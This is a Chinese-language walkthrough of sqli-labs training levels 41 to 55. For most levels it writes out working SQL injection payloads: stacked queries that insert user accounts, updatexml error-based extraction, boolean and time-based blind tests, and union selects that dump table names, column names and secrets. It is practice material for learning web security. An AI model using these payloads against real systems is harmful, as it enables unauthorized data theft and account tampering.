第四十一关

联合查询爆出数据库

但这关考察的时堆叠注入 ，我们给他注入一条数据

输入id=50即可查到我们注入的数据

 

---

第四十二关

看页面似曾相识，上次我们是用注册新用户然后对其他账户进行登录从而造成注入，但这次不能注册新用户了

存在堆叠注入函数，所以我们可以在密码哪里使用堆叠注入。向数据库里面插入密码账号，这样我们再来使用其进行登录就很简单了。 

login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login

 因为密码处有报错，所以我们使用报错注入爆出库名

login_user=1&login_password=1000'or updatexml(1,concat(1,database()),3)--+&mysubmit=Login

---

第四十三关

和第四十二关一样，只是闭合方式不同

login_user=1&login_password=1000')or updatexml(1,concat(1,database()),3)--+&mysubmit=Login

---

第四十四关

这关和四十二关一样，但是不能使用报错注入，不会显示报错信息

因为页面只有两种，我们尝试布尔盲注 ，正确页面没显示，确定数据库名为8位

用ascii码测试出库名，SCII码等于115，所以得出数据库第一位是s，继续测其它位就行

login_user=1&login_password=1000' or (ascii(substr(database() ,1,1)))=115--+&mysubmit=Login

---

第四十五关

和上一关一样，只是闭合方式不同，采用布尔盲注即可

---

第四十六关

这一关和其他关有所不同，根据页面提示我们的参数变成了sort，我们输入?sort=1，进入下图界面

输入?sort=1'会报错，就先尝试一下报错注入吧

成功爆出库名

?sort=1 and updatexml(1,concat(1,database()),3)--+ 

爆表名

?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3)--+

---

第四十七关

和上一关一样，只是闭合不同

?sort=1' and updatexml(1,concat(1,database()),3)--+

爆出库名

---

第四十八关

这关只有两个页面，所以考虑使用时间盲注

测出数据库有8位

?sort=1 and if(length(database())=8,sleep(1),1)--+

使用时间盲注语句得出数据库名第一位ascii码为115，同方法依次查出库名

?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)--+ 

---

第四十九关

和第四十八关一样，只不过是闭合不同

?sort=1' and if(length(database())=8,sleep(1),1)--+

---

第五十关

先加个'看看，报错了我们尝试使用报错函数

直接爆出库名

 ?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

---

第五十一关

有报错，所以用报错注入

先闭合

报错注入爆出库名

 

---

第五十二关

使用堆叠注入爆出库名

?sort=-1;insert into users(id,username,password) values ('103',(select database()),'uuuu')

---

第五十三关

和上一关一样，只不过闭合不同

?sort=-1';insert into users(id,username,password) values ('15',(select database()),'www.www')--+

 

---

第五十四关

后面的关卡和以前比更具有挑战性，第五十四关只能额在10次sql注入语句内通关

输入?id=1'--+成功闭合

 

只有3列

 

测回显点

 

爆库名

?id=-1' union select 1,database(),3--+

 

爆表名

?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='challenges'),3--+

 

爆列名

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='i38g8ldgl9'),3--+

---

第五十五关

和五十四关一样，闭合变成了)

爆库名

爆表名

 

爆列名

?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='zayn8vccza'),3--+ 

 

随便查一列数据

?id=-1) union select 1,(select group_concat(secret_LUAX) from zayn8vccza),3--+

 

代码搞进去看看